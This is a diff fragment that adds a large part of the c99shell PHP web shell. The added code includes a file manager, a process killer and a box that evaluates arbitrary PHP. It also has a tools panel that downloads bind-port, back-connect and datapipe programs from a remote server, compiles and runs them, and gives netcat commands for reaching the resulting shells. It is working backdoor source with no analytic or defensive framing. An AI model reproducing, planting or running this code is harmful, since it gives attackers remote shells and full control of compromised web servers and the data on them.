+ | $tab["files"] = array(); | ||
+ | $i = 0; | ||
+ | foreach ($objects as $a) | ||
+ | { | ||
+ | $v = $a[0]; | ||
+ | $o = basename($v); | ||
+ | $dir = dirname($v); | ||
+ | if ($disp_fullpath) {$disppath = $v;} | ||
+ | else {$disppath = $o;} | ||
+ | $disppath = str2mini($disppath,60); | ||
+ | if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} | ||
+ | elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} | ||
+ | foreach ($regxp_highlight as $r) | ||
+ | { | ||
+ | if (ereg($r[0],$o)) | ||
+ | { | ||
+ | if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} | ||
+ | else | ||
+ | { | ||
+ | $r[1] = round($r[1]); | ||
+ | $isdir = is_dir($v); | ||
+ | if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) | ||
+ | { | ||
+ | if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} | ||
+ | $disppath = $r[2].$disppath.$r[3]; | ||
+ | if ($r[4]) {break;} | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | $uo = urlencode($o); | ||
+ | $ud = urlencode($dir); | ||
+ | $uv = urlencode($v); | ||
+ | $row = array(); | ||
+ | if ($o == ".") | ||
+ | { | ||
+ | $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>"; | ||
+ | $row[] = "LINK"; | ||
+ | } | ||
+ | elseif ($o == "..") | ||
+ | { | ||
+ | $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>"; | ||
+ | $row[] = "LINK"; | ||
+ | } | ||
+ | elseif (is_dir($v)) | ||
+ | { | ||
+ | if (is_link($v)) | ||
+ | { | ||
+ | $disppath .= " => ".readlink($v); | ||
+ | $type = "LINK"; | ||
+ | $row[] = " <a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>"; } | ||
+ | else | ||
+ | { | ||
+ | $type = "DIR"; | ||
+ | $row[] = " <a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>"; | ||
+ | } | ||
+ | $row[] = $type; | ||
+ | } | ||
+ | elseif(is_file($v)) | ||
+ | { | ||
+ | $ext = explode(".",$o); | ||
+ | $c = count($ext)-1; | ||
+ | $ext = $ext[$c]; | ||
+ | $ext = strtolower($ext); | ||
+ | $row[] = " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\">".$disppath."</a>"; | ||
+ | $row[] = view_size($a[1]); | ||
+ | } | ||
+ | $row[] = date("d.m.Y H:i:s",$a[2]); | ||
+ | if (!$win) {$row[] = $a[3];} | ||
+ | $row[] = " <a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\"><b>".view_perms_color($v)."</b></a>"; | ||
+ | if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} | ||
+ | else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} | ||
+ | if (is_dir($v)){$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='d';document.todo.d.value='".$uv."';document.todo.submit();\">I</a> ".$checkbox;} | ||
+ | else {$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='info';document.todo.d.value='".$ud."';document.todo.submit();\">I</a> <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='edit';document.todo.d.value='".$ud."';document.todo.submit();\">E</a> <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">D</a> ".$checkbox;} | ||
+ | if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} | ||
+ | elseif (is_link($v)) {$tab["links"][] = $row;} | ||
+ | elseif (is_dir($v)) {$tab["folders"][] = $row;} | ||
+ | elseif (is_file($v)) {$tab["files"][] = $row;} | ||
+ | $i++; | ||
+ | } | ||
+ | } | ||
+ | //Compiling table | ||
+ | $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); | ||
+ | echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; | ||
+ | foreach($table as $row) | ||
+ | { | ||
+ | echo "<tr>\r\n"; | ||
+ | foreach($row as $v) {echo "<td>".$v."</td>\r\n";} | ||
+ | echo "</tr>\r\n"; | ||
+ | } | ||
+ | echo "</table><hr size=\"1\" noshade><p align=\"right\"> | ||
+ | |||
+ | <script> | ||
+ | function ls_setcheckboxall(status) | ||
+ | { | ||
+ | var id = 0; | ||
+ | var num = ".(count($table)-2)."; | ||
+ | while (id <= num) | ||
+ | { | ||
+ | document.getElementById('actbox'+id).checked = status; | ||
+ | id++; | ||
+ | } | ||
+ | } | ||
+ | function ls_reverse_all() | ||
+ | { | ||
+ | var id = 0; | ||
+ | var num = ".(count($table)-2)."; | ||
+ | while (id <= num) | ||
+ | { | ||
+ | document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; | ||
+ | id++; | ||
+ | } | ||
+ | } | ||
+ | </script> | ||
+ | <input type=\"button\" onclick=\"ls_setcheckboxall(1);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(0);\" value=\"Unselect all\"><b>"; | ||
+ | if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) | ||
+ | { | ||
+ | echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=submit name=\"actpastebuff\" value=\"Paste\"> <input type=submit name=\"actemptybuff\" value=\"Empty buffer\"> "; | ||
+ | } | ||
+ | echo "<select name=act><option value=\"".$act."\">With selected:</option>"; | ||
+ | echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; | ||
+ | echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; | ||
+ | if ($usefsbuff) | ||
+ | { | ||
+ | echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; | ||
+ | echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; | ||
+ | echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; | ||
+ | } | ||
+ | echo "</select> <input type=submit value=\"Confirm\"></p>"; | ||
+ | echo "</form>"; | ||
+ | } | ||
+ | } | ||
+ | if ($act == "tools") | ||
+ | { | ||
+ | $bndportsrcs = array( | ||
+ | "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), | ||
+ | "c99sh_bindport.c"=>array("Using C","%path %port %pass") | ||
+ | ); | ||
+ | $bcsrcs = array( | ||
+ | "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), | ||
+ | "c99sh_backconn.c"=>array("Using C","%path %host %port") | ||
+ | ); | ||
+ | $dpsrcs = array( | ||
+ | "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), | ||
+ | "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") | ||
+ | ); | ||
+ | if (!is_array($bind)) {$bind = array();} | ||
+ | if (!is_array($bc)) {$bc = array();} | ||
+ | if (!is_array($datapipe)) {$datapipe = array();} | ||
+ | |||
+ | if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} | ||
+ | if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} | ||
+ | |||
+ | if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} | ||
+ | if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} | ||
+ | |||
+ | if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} | ||
+ | if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} | ||
+ | if (!empty($bindsubmit)) | ||
+ | { | ||
+ | echo "<b>Result of binding port:</b><br>"; | ||
+ | $v = $bndportsrcs[$bind["src"]]; | ||
+ | if (empty($v)) {echo "Unknown file!<br>";} | ||
+ | elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} | ||
+ | else | ||
+ | { | ||
+ | $w = explode(".",$bind["src"]); | ||
+ | $ext = $w[count($w)-1]; | ||
+ | unset($w[count($w)-1]); | ||
+ | $srcpath = join(".",$w).".".rand(0,999).".".$ext; | ||
+ | $binpath = $tmpdir.join(".",$w).rand(0,999); | ||
+ | if ($ext == "pl") {$binpath = $srcpath;} | ||
+ | @unlink($srcpath); | ||
+ | $fp = fopen($srcpath,"ab+"); | ||
+ | if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} | ||
+ | elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} | ||
+ | else | ||
+ | { | ||
+ | fwrite($fp,$data,strlen($data)); | ||
+ | fclose($fp); | ||
+ | if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} | ||
+ | $v[1] = str_replace("%path",$binpath,$v[1]); | ||
+ | $v[1] = str_replace("%port",$bind["port"],$v[1]); | ||
+ | $v[1] = str_replace("%pass",$bind["pass"],$v[1]); | ||
+ | $v[1] = str_replace("//","/",$v[1]); | ||
+ | $retbind = myshellexec($v[1]." > /dev/null &"); | ||
+ | sleep(5); | ||
+ | $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); | ||
+ | if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} | ||
+ | else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View binder's process</u></a></center>";} | ||
+ | } | ||
+ | echo "<br>"; | ||
+ | } | ||
+ | } | ||
+ | if (!empty($bcsubmit)) | ||
+ | { | ||
+ | echo "<b>Result of back connection:</b><br>"; | ||
+ | $v = $bcsrcs[$bc["src"]]; | ||
+ | if (empty($v)) {echo "Unknown file!<br>";} | ||
+ | else | ||
+ | { | ||
+ | $w = explode(".",$bc["src"]); | ||
+ | $ext = $w[count($w)-1]; | ||
+ | unset($w[count($w)-1]); | ||
+ | $srcpath = join(".",$w).".".rand(0,999).".".$ext; | ||
+ | $binpath = $tmpdir.join(".",$w).rand(0,999); | ||
+ | if ($ext == "pl") {$binpath = $srcpath;} | ||
+ | @unlink($srcpath); | ||
+ | $fp = fopen($srcpath,"ab+"); | ||
+ | if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} | ||
+ | elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} | ||
+ | else | ||
+ | { | ||
+ | fwrite($fp,$data,strlen($data)); | ||
+ | fclose($fp); | ||
+ | if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} | ||
+ | $v[1] = str_replace("%path",$binpath,$v[1]); | ||
+ | $v[1] = str_replace("%host",$bc["host"],$v[1]); | ||
+ | $v[1] = str_replace("%port",$bc["port"],$v[1]); | ||
+ | $v[1] = str_replace("//","/",$v[1]); | ||
+ | $retbind = myshellexec($v[1]." > /dev/null &"); | ||
+ | echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | if (!empty($dpsubmit)) | ||
+ | { | ||
+ | echo "<b>Result of datapipe-running:</b><br>"; | ||
+ | $v = $dpsrcs[$datapipe["src"]]; | ||
+ | if (empty($v)) {echo "Unknown file!<br>";} | ||
+ | elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} | ||
+ | else | ||
+ | { | ||
+ | $srcpath = $tmpdir.$datapipe["src"]; | ||
+ | $w = explode(".",$datapipe["src"]); | ||
+ | $ext = $w[count($w)-1]; | ||
+ | unset($w[count($w)-1]); | ||
+ | $srcpath = join(".",$w).".".rand(0,999).".".$ext; | ||
+ | $binpath = $tmpdir.join(".",$w).rand(0,999); | ||
+ | if ($ext == "pl") {$binpath = $srcpath;} | ||
+ | @unlink($srcpath); | ||
+ | $fp = fopen($srcpath,"ab+"); | ||
+ | if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} | ||
+ | elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} | ||
+ | else | ||
+ | { | ||
+ | fwrite($fp,$data,strlen($data)); | ||
+ | fclose($fp); | ||
+ | if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} | ||
+ | list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); | ||
+ | $v[1] = str_replace("%path",$binpath,$v[1]); | ||
+ | $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); | ||
+ | $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); | ||
+ | $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); | ||
+ | $v[1] = str_replace("//","/",$v[1]); | ||
+ | $retbind = myshellexec($v[1]." > /dev/null &"); | ||
+ | sleep(5); | ||
+ | $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); | ||
+ | if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} | ||
+ | else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View datapipe process</u></a></center>";} | ||
+ | } | ||
+ | echo "<br>"; | ||
+ | } | ||
+ | } | ||
+ | ?><b>Binding port:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>"> Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>"> <select name="bind[src]"><?php | ||
+ | foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";} | ||
+ | ?></select> <input type=submit name=bindsubmit value="Bind"></form> | ||
+ | |||
+ | <b>Back connection:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>"> Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>"> <select name="bc[src]"><?php | ||
+ | foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} | ||
+ | ?></select> <input type=submit name=bcsubmit value="Connect"></form> | ||
+ | Click "Connect" only after open port for it. You should use NetCat©, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> | ||
+ | <b>Datapipe:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>"> Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>"> <select name="datapipe[src]"><?php | ||
+ | foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} | ||
+ | ?></select> <input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php | ||
+ | } | ||
+ | if ($act == "processes") | ||
+ | { | ||
+ | echo "<b>Processes:</b><br>"; | ||
+ | if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} | ||
+ | else {$handler = "tasklist";} | ||
+ | $ret = myshellexec($handler); | ||
+ | if (!$ret) {echo "Can't execute \"".$handler."\"!";} | ||
+ | else | ||
+ | { | ||
+ | if (empty($processes_sort)) {$processes_sort = $sort_default;} | ||
+ | $parsesort = parsesort($processes_sort); | ||
+ | if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} | ||
+ | $k = $parsesort[0]; | ||
+ | if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";} | ||
+ | else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";} | ||
+ | $ret = htmlspecialchars($ret); | ||
+ | if (!$win) | ||
+ | { | ||
+ | if ($pid) | ||
+ | { | ||
+ | if (is_null($sig)) {$sig = 9;} | ||
+ | echo "Sending signal ".$sig." to #".$pid."... "; | ||
+ | if (posix_kill($pid,$sig)) {echo "OK.";} | ||
+ | else {echo "ERROR.";} | ||
+ | } | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | $stack = explode("\n",$ret); | ||
+ | $head = explode(" ",$stack[0]); | ||
+ | unset($stack[0]); | ||
+ | for($i=0;$i<count($head);$i++) | ||
+ | { | ||
+ | if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."';document.todo.submit();\"><b>".$head[$i]."</b></a>";} | ||
+ | } | ||
+ | $prcs = array(); | ||
+ | foreach ($stack as $line) | ||
+ | { | ||
+ | if (!empty($line)) | ||
+ | { | ||
+ | echo "<tr>"; | ||
+ | $line = explode(" ",$line); | ||
+ | $line[10] = join(" ",array_slice($line,10)); | ||
+ | $line = array_slice($line,0,11); | ||
+ | if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} | ||
+ | $line[] = "<a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='".urlencode($d)."';document.todo.pid.value='".$line[1]."';document.todo.sig.value='9';document.todo.submit();\"><u>KILL</u></a>"; | ||
+ | $prcs[] = $line; | ||
+ | echo "</tr>"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | ||
+ | $ret = convert_cyr_string($ret,"d","w"); | ||
+ | $stack = explode("\n",$ret); | ||
+ | unset($stack[0],$stack[2]); | ||
+ | $stack = array_values($stack); | ||
+ | $head = explode(" ",$stack[0]); | ||
+ | $head[1] = explode(" ",$head[1]); | ||
+ | $head[1] = $head[1][0]; | ||
+ | $stack = array_slice($stack,1); | ||
+ | unset($head[2]); | ||
+ | $head = array_values($head); | ||
+ | |||
+ | if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";} | ||
+ | else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";} | ||
+ | if ($k > count($head)) {$k = count($head)-1;} | ||
+ | for($i=0;$i<count($head);$i++) | ||
+ | { | ||
+ | if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."a\"';document.todo.submit();\"><b>".trim($head[$i])."</b></a>";} | ||
+ | } | ||
+ | $prcs = array(); | ||
+ | foreach ($stack as $line) | ||
+ | { | ||
+ | if (!empty($line)) | ||
+ | { | ||
+ | echo "<tr>"; | ||
+ | $line = explode(" ",$line); | ||
+ | $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); | ||
+ | $line[2] = intval(str_replace(" ","",$line[2]))*1024; | ||
+ | $prcs[] = $line; | ||
+ | echo "</tr>"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | $head[$k] = "<b>".$head[$k]."</b>".$y; | ||
+ | $v = $processes_sort[0]; | ||
+ | usort($prcs,"tabsort"); | ||
+ | if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} | ||
+ | $tab = array(); | ||
+ | $tab[] = $head; | ||
+ | $tab = array_merge($tab,$prcs); | ||
+ | echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; | ||
+ | foreach($tab as $i=>$k) | ||
+ | { | ||
+ | echo "<tr>"; | ||
+ | foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} | ||
+ | echo "</tr>"; | ||
+ | } | ||
+ | echo "</table>"; | ||
+ | } | ||
+ | } | ||
+ | if ($act == "eval") | ||
+ | { | ||
+ | if (!empty($eval)) | ||
+ | { | ||
+ | echo "<b>Result of execution this PHP-code</b>:<br>"; | ||
+ | $tmp = ob_get_contents(); | ||
+ | $olddir = realpath("."); | ||
+ | @chdir($d); | ||
+ | if ($tmp) | ||
+ | { | ||
+ | ob_clean(); | ||
+ | eval($eval); | ||
+ | $ret = ob_get_contents(); | ||
+ | $ret = convert_cyr_string($ret,"d","w"); | ||
+ | ob_clean(); | ||
+ | echo $tmp; | ||
+ | if ($eval_txt) | ||
+ | { | ||
+ | $rows = count(explode("\r\n",$ret))+1; | ||
+ | if ($rows < 10) {$rows = 10;} | ||
+ | echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; | ||
+ | } | ||
+ | else {echo $ret."<br>";} | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | if ($eval_txt) | ||
+ | { | ||
+ | echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; | ||
+ | eval($eval); | ||
+ | echo "</textarea>"; | ||
+ | } | ||
+ | else {echo $ret;} | ||
+ | } | ||
+ | @chdir($olddir); | ||
+ | } | ||
+ | else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} | ||
+ | echo "<form method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; | ||
+ | } | ||
+ | if ($act == "f") | ||
+ | { | ||
+ | if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") | ||
+ | { | ||
+ | if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} | ||
+ | else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='edit';document.todo.c.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><u>Create</u></a></center>";} | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $r = @file_get_contents($d.$f); | ||
+ | $ext = explode(".",$f); | ||
+ | $c = count($ext)-1; | ||
+ | $ext = $ext[$c]; | ||
+ | $ext = strtolower($ext); | ||
+ | $rft = ""; | ||
+ | foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} | ||
+ | if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} | ||
+ | if (empty($ft)) {$ft = $rft;} | ||
+ | $arr = array( | ||
+ | array("DIZ","info"), | ||
+ | array("HTML","html"), | ||
+ | array("TXT","txt"), | ||
+ | array("Code","code"), | ||
+ | array("Session","phpsess"), | ||
+ | array("EXE","exe"), | ||
+ | array("SDB","sdb"), | ||
+ | array("INI","ini"), | ||
+ | array("DOWNLOAD","download"), | ||
+ | array("RTF","notepad"), | ||
+ | array("EDIT","edit") | ||
+ | ); | ||
+ | echo "<b>Viewing file: ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; | ||
+ | foreach($arr as $t) | ||
+ | { | ||
+ | if ($t[1] == $rft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><font color=green>".$t[0]."</font></a>";} | ||
+ | elseif ($t[1] == $ft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b><u>".$t[0]."</u></b></a>";} | ||
+ | else {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".$t[0]."</b></a>";} | ||
+ | echo " |"; | ||
+ | } | ||
+ | echo "<hr size=\"1\" noshade>"; | ||
+ | if ($ft == "info") | ||
+ | { | ||
+ | echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; | ||
+ | if (!$win) | ||
+ | { | ||
+ | echo "<tr><td><b>Owner/Group</b></td><td> "; | ||
+ | $ow = posix_getpwuid(fileowner($d.$f)); | ||
+ | $gr = posix_getgrgid(filegroup($d.$f)); | ||
+ | echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); | ||
+ | } | ||
+ | echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='".urlencode($f)."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; | ||
+ | $fi = fopen($d.$f,"rb"); | ||
+ | if ($fi) | ||
+ | { | ||
+ | if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} | ||
+ | else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} | ||
+ | $n = 0; | ||
+ | $a0 = "00000000<br>"; | ||
+ | $a1 = ""; | ||
+ | $a2 = ""; | ||
+ | for ($i=0; $i<strlen($str); $i++) | ||
+ | { | ||
+ | $a1 .= sprintf("%02X",ord($str[$i]))." "; | ||
+ | switch (ord($str[$i])) | ||
+ | { | ||
+ | case 0: $a2 .= "<font>0</font>"; break; | ||
+ | case 32: | ||
+ | case 10: | ||
+ | case 13: $a2 .= " "; break; | ||
+ | default: $a2 .= htmlspecialchars($str[$i]); | ||
+ | } | ||
+ | $n++; | ||
+ | if ($n == $hexdump_rows) | ||
+ | { | ||
+ | $n = 0; | ||
